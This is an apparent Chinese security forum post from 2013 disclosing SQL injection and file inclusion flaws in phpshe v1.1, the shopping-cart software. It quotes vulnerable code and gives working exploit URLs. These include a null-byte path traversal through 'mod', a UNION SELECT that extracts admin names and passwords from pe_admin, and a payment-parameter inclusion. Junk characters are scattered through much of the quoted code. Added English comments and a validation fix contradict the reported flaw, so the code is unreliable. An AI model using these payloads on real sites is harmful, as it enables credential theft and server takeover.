
phpshe v1.1多处SQL注入和文件包含漏洞Getshell

发表于 2013-4-16 16:45:03
/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0×00 整体大概参数传输
//common.php
// Expand the request superglobals into prefixed globals:
//   $_GET -> $_g_*, $_POST -> $_p_*, $_SESSION -> $_s_*, $_COOKIE -> $_c_*
// Every $_g_* / $_p_* / $_c_* variable read later in the application is therefore
// raw client input. Nothing in this block escapes for SQL or for file paths
// (pe_trim()/pe_stripslashes() are defined elsewhere); the product list below
// concatenates $_g_keyword straight into a query and index.php hands
// $_c_cart_list to unserialize().
// get_magic_quotes_gpc() was removed in PHP 8.0, so on current PHP only the
// else branch can run.
if (get_magic_quotes_gpc()) {
    if (!empty($_GET)) {
        extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
    }
    if (!empty($_POST)) {
        extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
    }
} else {
    if (!empty($_GET)) {
        extract(pe_trim($_GET), EXTR_PREFIX_ALL, '_g');
    }
    if (!empty($_POST)) {
        extract(pe_trim($_POST), EXTR_PREFIX_ALL, '_p');
    }
}

session_start();

if (!empty($_SESSION)) {
    extract(pe_trim($_SESSION), EXTR_PREFIX_ALL, '_s');
}
// Cookies are attacker-controlled; the '_c' prefix only avoids name clashes, it does not make them trusted.
if (!empty($_COOKIE)) {
    extract(pe_trim(pe_stripslashes($_COOKIE)), EXTR_PREFIX_ALL, '_c');
}

0×01 包含漏洞
//首页文件
<?php
// Front controller: load the shared bootstrap (request extraction and URL routing
// live in common.php), read the page caches, then include the routed module file.
include('common.php');

$cache_category     = cache::get('category');
$cache_category_arr = cache::get('category_arr');
$cache_class        = cache::get('class');
$cache_ad           = cache::get('ad');
$cache_link         = cache::get('link');
$cache_page         = cache::get('page');

// Site QQ contacts: a comma-separated setting, or an empty list when unset.
$web_qq = array();
if ($cache_setting['web_qq']['setting_value']) {
    $web_qq = explode(',', $cache_setting['web_qq']['setting_value']);
}

// Cart badge: logged-in users are counted from the database, guests from the cookie.
// NOTE(review): $_c_cart_list is the raw cookie value (common.php extracts $_COOKIE
// into $_c_*), so this unserialize() runs on client-controlled data; a JSON-encoded
// cookie would be the safer transport.
if (pe_login('user')) {
    $cart_num = $db->pe_num('cart', array('user_id' => $_s_user_id));
} else {
    $cart_num = unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0;
}

// $mod is taken from the request by the routing code in common.php and is interpolated
// into the include path without any restriction, so a value such as
// "../../robots.txt%00" leaves the module directory - the file inclusion reported above.
include("{$pe['path_root']}module/{$module}/{$mod}.php");
pe_result();
//common 文件 第15行开始
url路由配置
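// URL routing: which module/action file index.php will include and which record id
// the module reads. All three come straight from the request (POST wins over GET),
// so they are untrusted input. !empty() keeps the original truthiness semantics
// without the undefined-index notice.
$module = $mod = $act = 'index';
$mod = !empty($_POST['mod']) ? $_POST['mod'] : (!empty($_GET['mod']) ? $_GET['mod'] : $mod);
$act = !empty($_POST['act']) ? $_POST['act'] : (!empty($_GET['act']) ? $_GET['act'] : $act);
$id  = !empty($_POST['id'])  ? $_POST['id']  : (!empty($_GET['id'])  ? $_GET['id']  : null);

// $mod is interpolated into an include() path ("module/{$module}/{$mod}.php" in index.php),
// so a value such as "../../robots.txt%00" walks out of the module directory. Module and
// action names are plain identifiers; reject anything else before the value reaches the
// include or a switch. pe_error() is the application's error path (used the same way in
// order.php); it is assumed to terminate the request - confirm.
if (!preg_match('/^[A-Za-z0-9_-]+$/', $mod) || !preg_match('/^[A-Za-z0-9_-]+$/', $act)) {
    pe_error('模块参数错误...');
}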
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%005 p5 T2 C. U; @) r


0×02 搜索注入

<code id="code2">

//product.php文件
case 'list':! ^0 n) h' Q* z& C3 l
$category_id = intval($id);
1 M6 s; x' Y& i4 |6 i$info = $db->pe_select('category', array('category_id'=>$category_id));8 ~$ \; Q- F9 ]5 `
//搜索! J& ~2 ]+ X7 I: G- q
$sqlwhere = " and `product_state` = 1";+ u5 J0 V* E+ ^5 k+ f& k3 m
pe_lead('hook/category.hook.php');) J+ M, h. a1 Y6 W  W1 N
if ($category_id) {
' d9 H! ?1 ]" ^$ |6 o5 Uwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";# m$ \% S2 ]2 d; Z% U; n/ ?, [+ Z
}
, ^& C& Y: f; U7 e1 o* ?/ |. ~" K$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤" U, f" K/ K' J# h! C9 k
if ($_g_orderby) {" v( U- D1 F# M* t
$orderby = explode('_', $_g_orderby);. {5 }3 v& |' M% a* p
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
' \' K! r: b. x2 U$ ]}
! V" @2 j3 B' v9 yelse {( z5 e  w3 n  k5 K
$sqlwhere .= " order by `product_id` desc";* Y, F: q2 x' s. J
}* v/ b1 d' F/ y; _: L! [0 z  G4 N1 z
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
8 i# C: r9 f3 |$ w& ]! x: ^1 K//热卖排行; D" j- Z9 |# z9 s0 M$ |
$product_hotlist = product_hotlist();
. }! a9 l" m* p; |//当前路径
0 \# M  y1 T3 b8 C+ G2 H9 W8 z$nowpath = category_path($category_id);
/ @# a5 S) _/ H0 i' P/ `$seo = pe_seo($info['category_name']);' V* A$ G; Z( m: T( q
include(pe_tpl('product_list.html'));
//跟进selectall函数库
/**
 * Select every row of `$table` that matches `$where`.
 *
 * `$where` is handed to _dowhere() and the result is interpolated verbatim into
 * the SQL text, as are `$table` and `$field`. None of them may be built from raw
 * request input by the caller: the product list above passes a `$sqlwhere` that
 * contains `$_g_keyword` unescaped, which is the injection reported on this page.
 *
 * @param string       $table      table name without the dbpre prefix
 * @param string|array $where      condition - array form (see the category lookup
 *                                 above) or a raw " and ..." fragment
 * @param string       $field      column list, defaults to all columns
 * @param array        $limit_page passed through to sql_selectall(); judging from
 *                                 the product list call it is (per page, page number)
 */
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
    $condition = $this->_dowhere($where);
    $sql = "select {$field} from `" . dbpre . "{$table}` {$condition}";

    return $this->sql_selectall($sql, $limit_page);
}
//exp
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
6 h! K& s' S5 y" U" f; b  O8 I

</code>
0×03 包含漏洞2
<code id="code3">

//order.php

case 'pay':


) z) T8 `) C7 _7 t9 n# K8 ]- o2 n- C$order_id = pe_dbhold($_g_id);


& K5 t6 q( p: U( l3 }+ P$cache_payway = cache::get('payway');


$ z. {6 {1 _: ]. {; ?foreach($cache_payway as $k => $v) {

6 D0 p, O: v* L/ b; r( Y1 S6 [8 ?
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

9 w7 G: ]  c8 o$ `
if ($k == 'bank') {

) C3 g+ m$ k/ ?, j9 R3 k/ s5 ^$ M
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

, r+ }# [! z# a, v* r5 Y( w! A/ x
}

) g7 z4 K4 |4 j/ B: Q5 N
}


5 N! R; D6 E! w' r9 @6 L$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


; v' Z5 _+ T% p7 N( y4 {/ ~!$order['order_id'] && pe_error('订单号错误...');

: {+ I# c7 h7 D. c3 x
if (isset($_p_pesubmit)) {

! |6 a/ T* ]6 X, q
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

  H, `; k6 {/ \$ ]/ X
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

1 u; l: ^+ T' g- ^! ?
foreach ($info_list as $v) {

) U$ M! ~$ _: J* E
$order['order_name'] .= "{$v['product_name']};";% O- z% Y1 x2 k: O- {$ t& A' N


5 E: z% R+ J5 q9 {, A! d}


# [8 c4 e- U$ F$ X5 Gecho '正在为您连接支付网站,请稍后...';


! L5 ^$ T$ e2 O: hinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


/ P& j1 J8 a# ?: b}//当一切准备好的时候就可以进行"鸡肋包含了"


$ ]0 t' i1 }9 J: B5 I& t8 telse {

5 M+ l0 z0 v; g" `' M3 M8 t1 z5 y
pe_error('支付错误...');

% U( m  D: O$ z* l; \
}

6 Q% h  d( Q  m' W
}

$ c' h' Z) \3 C/ Z- @# ^2 L
$seo = pe_seo('选择支付方式');


* p) Z1 p# G( h% u2 d0 ]include(pe_tpl('order_pay.html'));

* V; y* I/ ^5 g3 H# z3 N% U
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg
